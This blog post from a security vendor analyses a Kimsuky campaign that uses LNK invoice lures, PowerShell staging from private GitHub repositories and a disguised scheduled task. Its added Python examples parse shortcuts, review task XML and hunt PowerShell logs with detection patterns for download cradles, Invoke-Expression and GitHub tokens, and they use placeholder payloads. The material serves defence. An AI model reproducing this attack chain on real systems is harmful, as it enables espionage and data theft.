
North Korean Hackers Use GitHub to Spread LNK Malware

Written by Levi Yoris | Sep 11, 2025 1:00:00 PM

The North Korea-linked hacking group Kimsuky has stepped up its cyber operations. They are now using GitHub repositories as a platform to distribute malware and exfiltrate sensitive data—a sophisticated evolution in their tactics.

They’re leveraging malicious LNK files (Windows shortcuts) disguised as electronic invoices. What looks like a simple PDF file is actually the first step in a full-blown attack chain that can compromise your device.

At TecnetOne, we’ve analyzed this campaign because it exemplifies how cybercriminals exploit legitimate infrastructure to bypass security controls and maintain persistent access to compromised systems.

 

How the Attack Starts

It begins with a ZIP file containing a shortcut file with an appealing name, such as:

전자세금계산서.pdf.lnk

(This means "electronic tax invoice" in Korean.)

Opening this LNK file triggers a PowerShell command that downloads and runs additional scripts hosted on private GitHub repositories controlled by the attackers.

That initial payload establishes the foundation for:

  1. Systematic data collection
  2. Long-term persistence on the victim’s machine
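To make the lure concrete from the defender's side, here is an added Python example, written for this post and not code from the campaign, from S2W or from TecnetOne. It parses the fixed 76-byte header and the StringData sections of a Windows shortcut as laid out in the MS-SHLLINK format, then flags the traits described above: a document extension sitting in front of .lnk, a PowerShell target, a hidden window, and a reference to GitHub in the arguments. The shortcut bytes, the comparison shortcut and the placeholder command line are constructed for the example; the real lure's command line is not reproduced.

```python
import struct

# Constants from the MS-SHLLINK specification (Shell Link Binary File Format).
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
# StringData sections appear in this fixed order, each present only if its flag is set.
STRING_FIELDS = (
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)
DOCUMENT_EXTENSIONS = {"pdf", "doc", "docx", "xls", "xlsx", "hwp", "txt"}


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields (target path, arguments, ...) of a .lnk file."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C:
        raise ValueError("not a shell link: bad HeaderSize")
    if data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link: bad CLSID")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 76
    if flags & HAS_LINK_TARGET_ID_LIST:   # IDListSize (2 bytes) followed by the IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:             # LinkInfoSize counts the size field itself
        pos += struct.unpack_from("<I", data, pos)[0]
    is_unicode = bool(flags & IS_UNICODE)
    fields = {}
    for flag, name in STRING_FIELDS:
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]  # CountCharacters, no terminator
        pos += 2
        nbytes = count * 2 if is_unicode else count
        raw = data[pos:pos + nbytes]
        if len(raw) != nbytes:
            raise ValueError(f"truncated StringData field {name}")
        pos += nbytes
        fields[name] = raw.decode("utf-16-le" if is_unicode else "cp1252")
    return fields


def triage_lnk(filename: str, data: bytes) -> list:
    """Flag traits of the lure described in the post; returns a list of finding tags."""
    findings = []
    lower_name = filename.lower()
    if lower_name.endswith(".lnk"):
        inner_ext = lower_name[:-4].rsplit(".", 1)[-1]
        if inner_ext in DOCUMENT_EXTENSIONS:
            findings.append("double_extension")       # e.g. invoice.pdf.lnk
    fields = parse_lnk(data)
    target = (fields.get("relative_path", "") + " " + fields.get("name", "")).lower()
    args = fields.get("arguments", "").lower()
    if "powershell" in target or "powershell" in args:
        findings.append("launches_powershell")
    if "-windowstyle hidden" in args or " -w hidden" in args:
        findings.append("hidden_window")
    if "github" in args:
        findings.append("references_github")
    return findings


def build_sample_lnk(relative_path: str, arguments: str) -> bytes:
    """Constructed sample: a minimal spec-conformant .lnk with a relative target and arguments."""
    flags = HAS_LINK_TARGET_ID_LIST | HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = (
        struct.pack("<I", 0x4C) + LNK_CLSID + struct.pack("<I", flags)
        + struct.pack("<I", 0x20)            # FileAttributes: FILE_ATTRIBUTE_ARCHIVE
        + b"\x00" * 24                       # CreationTime, AccessTime, WriteTime (zero)
        + struct.pack("<IIIH", 0, 0, 7, 0)   # FileSize, IconIndex, ShowCommand, HotKey
        + b"\x00" * 10                       # Reserved1, Reserved2, Reserved3
    )
    id_list = struct.pack("<H", 2) + b"\x00\x00"   # empty IDList: only the TerminalID

    def string_data(s: str) -> bytes:
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    return header + id_list + string_data(relative_path) + string_data(arguments)


# Constructed samples (not artefacts from the campaign): the lure name from the post with a
# PowerShell target and a placeholder command line, plus a benign shortcut for comparison.
LURE_NAME = "전자세금계산서.pdf.lnk"
LURE_LNK = build_sample_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    '-NoProfile -WindowStyle Hidden -Command "# PLACEHOLDER: fetch stage 2 from a github.com repo"',
)
BENIGN_LNK = build_sample_lnk(r"..\notes.txt", "")

if __name__ == "__main__":
    print(LURE_NAME, "->", triage_lnk(LURE_NAME, LURE_LNK))
    print("notes.lnk ->", triage_lnk("notes.lnk", BENIGN_LNK))
```

The parser deliberately refuses anything whose HeaderSize or CLSID is wrong rather than guessing, so a renamed non-shortcut raises instead of producing an empty, misleading result; run it over the contents of incoming ZIP attachments before they reach a user's desktop.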

 

Using GitHub as a Malware Hub

Researchers at S2W discovered at least nine private repositories linked to this campaign, with names like group_0717, hometax, and group_0803.

Shockingly, the attackers embedded GitHub personal access tokens directly in their PowerShell scripts. This gave the scripts authenticated, structured access to the private repositories—highlighting a high level of operational planning.

Even the commit history revealed email addresses tied to the campaign, such as:

sahiwalsuzuki4[@]gmail.com

 


Advanced Persistence

Once a device is infected, the malware runs a script named main.ps1, which creates another file in the %AppData% folder called:

MicrosoftEdgeUpdate.ps1

Then, it sets up an automated task called:

BitLocker MDM policy Refresh

This task runs every 30 minutes after a 5-minute delay. Its goal: continuously download and run new scripts from GitHub, ensuring the attackers retain access—even if passwords are changed or sessions are closed.
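As an added example, not the malware's own task definition, the following Python reviews a Windows scheduled task exported as XML (for instance with schtasks /query /tn "name" /xml) and flags the combination described above: a script-host action pointing at a script under %AppData%, a hidden window, and a short repetition interval. The two task definitions are constructed stand-ins modelled on the names in the post; that the real task used a time trigger with a start boundary a few minutes after creation is an assumption, and the detection does not depend on it.

```python
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
SCRIPT_HOSTS = ("powershell", "pwsh", "wscript", "cscript", "mshta")
USER_WRITABLE_MARKERS = ("%appdata%", "\\appdata\\", "%localappdata%", "%temp%", "\\temp\\", "%public%")


def iso_duration_to_minutes(value: str) -> float:
    """Convert the ISO 8601 durations Task Scheduler uses (PT30M, PT1H, P1D, ...) to minutes."""
    m = re.fullmatch(r"P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?", value.strip())
    if not m:
        raise ValueError(f"unsupported duration: {value!r}")
    days, hours, minutes, seconds = (int(g) if g else 0 for g in m.groups())
    return days * 1440 + hours * 60 + minutes + seconds / 60


def review_task(task_xml: str) -> dict:
    """Summarise a task definition and list the persistence traits it exhibits."""
    root = ET.fromstring(task_xml)
    name = (root.findtext("t:RegistrationInfo/t:URI", "", NS) or "").strip()
    actions = []
    for ex in root.findall("t:Actions/t:Exec", NS):
        cmd = (ex.findtext("t:Command", "", NS) or "").strip()
        args = (ex.findtext("t:Arguments", "", NS) or "").strip()
        actions.append((cmd, args))
    intervals = [iso_duration_to_minutes(e.text)
                 for e in root.findall(".//t:Repetition/t:Interval", NS) if e.text]
    joined = " ".join(f"{c} {a}" for c, a in actions).lower()
    findings = []
    if any(h in joined for h in SCRIPT_HOSTS):
        findings.append("script_host_action")
    if any(mk in joined for mk in USER_WRITABLE_MARKERS):
        findings.append("script_in_user_writable_dir")
    if "-windowstyle hidden" in joined or " -w hidden" in joined:
        findings.append("hidden_window")
    if any(i <= 60 for i in intervals):   # an hour or less between runs: polling behaviour
        findings.append("short_repetition_interval")
    return {"name": name, "actions": actions, "interval_minutes": intervals, "findings": findings}


# Constructed task XML modelled on the names in the post (trigger type is an assumption).
SAMPLE_TASK_XML = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\\BitLocker MDM policy Refresh</URI></RegistrationInfo>
  <Triggers>
    <TimeTrigger>
      <StartBoundary>2025-09-11T13:05:00</StartBoundary>
      <Repetition><Interval>PT30M</Interval><StopAtDurationEnd>false</StopAtDurationEnd></Repetition>
      <Enabled>true</Enabled>
    </TimeTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>powershell.exe</Command>
      <Arguments>-NoProfile -WindowStyle Hidden -File "%AppData%\\MicrosoftEdgeUpdate.ps1"</Arguments>
    </Exec>
  </Actions>
</Task>"""

# Constructed benign task for comparison: a vendor updater that runs once a day.
BENIGN_TASK_XML = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\\Vendor\\Updater</URI></RegistrationInfo>
  <Triggers><CalendarTrigger><StartBoundary>2025-09-11T03:00:00</StartBoundary>
    <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay></CalendarTrigger></Triggers>
  <Actions Context="Author"><Exec><Command>"C:\\Program Files\\Vendor\\updater.exe"</Command>
    <Arguments>/silent</Arguments></Exec></Actions>
</Task>"""

if __name__ == "__main__":
    for xml_text in (SAMPLE_TASK_XML, BENIGN_TASK_XML):
        print(review_task(xml_text))
```

When feeding real exports, read the file in binary mode and pass the bytes to ET.fromstring: schtasks writes UTF-16 with a declaration, and ElementTree honours that when it receives bytes rather than an already-decoded string. Any single finding can be legitimate; it is the combination of a script host, a user-writable script path and a sub-hourly interval that deserves a look.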

 

Dynamic Script Management and Data Theft

The malware features a dynamic system to manage scripts and organize stolen data:

  1. It downloads a file called real.txt from GitHub
  2. Replaces dummy values with unique timestamped identifiers, like ntxBill_{MMdd_HHmm}
  3. Reuploads the modified file into organized folders by date and time

This process allows attackers to track each infection, manage multiple compromised systems, and build a detailed intelligence archive.

 

What Data Is Being Stolen?

The spyware component collects virtually everything it can find:

  1. IP address
  2. System boot times
  3. OS version
  4. Hardware specs
  5. Device type
  6. OS install date
  7. Active processes

All of this is logged and uploaded back to the attackers’ repositories—creating a “control panel” of infected systems.

 

Why This Attack Is So Dangerous

This campaign raises major red flags for several reasons:

  1. Use of legitimate infrastructure: GitHub is trusted, so connections often go unnoticed by security tools.
  2. Self-updating persistence: The malware evolves constantly, keeping the door open.
  3. Organized data exfiltration: Every infection is recorded precisely—making the information highly valuable for espionage or targeted attacks.

For attackers, this model is scalable and stealthy. For organizations, it’s a serious risk of prolonged, silent data breaches.

 


Lessons for You and Your Business

At TecnetOne, we emphasize that the biggest threat is not just the sophistication of attackers—but our own lack of preparation.

Here’s how to respond:

  1. Train your team: Many attacks start with a simple ZIP file or disguised link.
  2. Monitor PowerShell usage: It is a legitimate tool that is often abused for malicious purposes.
  3. Implement behavior-based security: Malware can hide itself, but its activity is detectable with the right tools.
  4. Control application execution: Restrict unsigned scripts and unknown shortcuts.
  5. Have an incident response plan: If a device is compromised, isolate it and act fast.
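"Monitor PowerShell usage" is most effective with script block logging turned on (PowerShell event ID 4104), and the earlier sections on the real.txt / ntxBill_ workflow and the host data collected give concrete things to look for in those events. The following added Python example, which is not code from the campaign or from TecnetOne, reassembles 4104 fragments (long scripts are logged as several events sharing a ScriptBlockId, numbered MessageNumber 1..MessageTotal) and scores each reassembled script on a combination of indicators: a GitHub API or raw-content endpoint, a personal-access-token literal, a download cradle, dynamic execution, the file and identifier names from the post, and host-reconnaissance cmdlets. The event records, the script text and the token placeholder are constructed; the indicator weights and threshold are this example's own choices.

```python
import re

# Indicator patterns over the reassembled script text. Weights and threshold are this
# example's own choices; tune them against your environment's baseline.
INDICATORS = {
    "github_endpoint":    (2, re.compile(r"api\.github\.com|raw\.githubusercontent\.com", re.I)),
    "github_pat_literal": (5, re.compile(r"\b(?:ghp_[A-Za-z0-9]{36}|github_pat_[A-Za-z0-9_]{22,})\b")),
    "download_cradle":    (2, re.compile(r"Invoke-RestMethod|Invoke-WebRequest|\birm\b|\biwr\b|DownloadString", re.I)),
    "dynamic_execution":  (2, re.compile(r"Invoke-Expression|\biex\b", re.I)),
    "campaign_filenames": (3, re.compile(r"real\.txt|main\.ps1|MicrosoftEdgeUpdate\.ps1|ntxBill_", re.I)),
    "host_recon":         (1, re.compile(r"Get-Process|Win32_OperatingSystem|Win32_ComputerSystem|LastBootUpTime|InstallDate", re.I)),
}
ALERT_THRESHOLD = 6


def reassemble_script_blocks(records):
    """Join 4104 fragments sharing a ScriptBlockId in MessageNumber order; skip incomplete ones."""
    chunks = {}
    for rec in records:
        chunks.setdefault(rec["ScriptBlockId"], []).append(rec)
    blocks = {}
    for sbid, parts in chunks.items():
        parts.sort(key=lambda r: r["MessageNumber"])
        expected = list(range(1, parts[0]["MessageTotal"] + 1))
        if [p["MessageNumber"] for p in parts] != expected:
            continue   # fragments still arriving or dropped: do not score a partial script
        blocks[sbid] = "".join(p["ScriptBlockText"] for p in parts)
    return blocks


def score_script(text):
    """Return (score, list of indicator names that matched) for one script's full text."""
    hits = [name for name, (_, rx) in INDICATORS.items() if rx.search(text)]
    return sum(INDICATORS[h][0] for h in hits), hits


def hunt(records):
    """Score every complete script block and return those at or above the alert threshold."""
    alerts = []
    for sbid, text in reassemble_script_blocks(records).items():
        score, hits = score_script(text)
        if score >= ALERT_THRESHOLD:
            alerts.append({"ScriptBlockId": sbid, "score": score, "hits": hits})
    return alerts


# Constructed sample script in the shape the post describes; the token is a placeholder
# with the classic-PAT prefix and length, not a real credential.
FAKE_PAT = "ghp_" + "0" * 36
STAGE_SCRIPT = (
    "$pat = '" + FAKE_PAT + "'\n"
    "$h = @{ Authorization = 'token ' + $pat }\n"
    "$r = Invoke-RestMethod -Headers $h -Uri 'https://api.github.com/repos/PLACEHOLDER/hometax/contents/real.txt'\n"
    "$info = Get-CimInstance Win32_OperatingSystem | Select-Object Version, InstallDate, LastBootUpTime\n"
    "# ... constructed remainder: ntxBill_ naming and Invoke-Expression of the next stage\n"
)

# Constructed 4104 records: the staged script logged as two out-of-order fragments, plus two
# benign single-fragment scripts that share some indicators but not the combination.
SAMPLE_4104 = [
    {"ScriptBlockId": "b1", "MessageNumber": 2, "MessageTotal": 2, "ScriptBlockText": STAGE_SCRIPT[120:]},
    {"ScriptBlockId": "b1", "MessageNumber": 1, "MessageTotal": 2, "ScriptBlockText": STAGE_SCRIPT[:120]},
    {"ScriptBlockId": "b2", "MessageNumber": 1, "MessageTotal": 1,
     "ScriptBlockText": "Invoke-WebRequest -Uri 'https://api.github.com/repos/PLACEHOLDER/tool/releases/latest'"},
    {"ScriptBlockId": "b3", "MessageNumber": 1, "MessageTotal": 1,
     "ScriptBlockText": "Get-Process | Sort-Object CPU -Descending | Select-Object -First 5"},
]

if __name__ == "__main__":
    for alert in hunt(SAMPLE_4104):
        print(alert)
```

Two design points matter in practice. Scoring a single fragment under-counts (the token literal may sit in a different event from the download), which is why the reassembly step exists and why incomplete blocks are skipped rather than scored. And a lone GitHub API call or a lone Get-Process is normal administrative activity; the threshold is only crossed when several of the post's traits appear together.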

 

The Role of Strategic Partners

Basic antivirus is not enough. At TecnetOne, we work with leading cybersecurity vendors to offer:

  1. Advanced endpoint detection using behavior analytics
  2. Secure data backups with rapid recovery
  3. Red Team simulations to identify weaknesses before attackers do
  4. 24/7 incident response to contain and remediate threats quickly

 

Conclusion: This Threat Cannot Be Ignored

The Kimsuky campaign shows how state-backed hackers are refining their methods to evade defenses and maintain access to critical systems.

Using GitHub as a malware distribution platform is a clear example of attackers abusing trusted infrastructure to fly under the radar.

Cybersecurity is no longer optional. You need a mix of prevention, detection, and fast response. At TecnetOne, we’re ready to help you strengthen your strategy—because every minute counts when stopping an attack.